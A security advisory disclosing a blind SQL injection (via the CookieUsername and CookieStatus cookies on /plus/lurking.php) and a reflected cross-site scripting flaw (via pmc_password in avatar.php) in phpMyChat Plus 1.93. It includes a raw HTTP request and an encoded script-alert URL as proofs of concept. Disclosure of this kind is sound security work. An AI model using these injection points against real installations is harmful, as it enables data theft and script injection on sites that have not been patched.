phpMyChat Plus 1.93 Multiple Vulnerabilities

2011-04-25 16:15:06

------------------------------------------------------------------------
Software................phpMyChat Plus 1.93
Vulnerability...........Blind SQL Injection
Threat Level............Serious (3/5)
Download................http://sourceforge.net/projects/phpmychat/
Discovery Date..........4/25/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <[email protected]>
------------------------------------------------------------------------


--Description--

A SQL injection vulnerability in phpMyChat Plus 1.93 can be exploited
to extract arbitrary data.


--PoC--

POST /plus/lurking.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Cookie: CookieUsername=[SQL]; CookieStatus=[SQL]; CookieRoom=x; CookieLang=x; CookieUserSort=x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------------------------------------------------------------------------
Software................phpMyChat Plus 1.93
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://sourceforge.net/projects/phpmychat/
Discovery Date..........4/25/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <[email protected]>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in phpMyChat Plus 1.93
can be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/plus/avatar.php?pmc_password=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

Fixes

No fixes

In order to submit a new fix you need to be registered.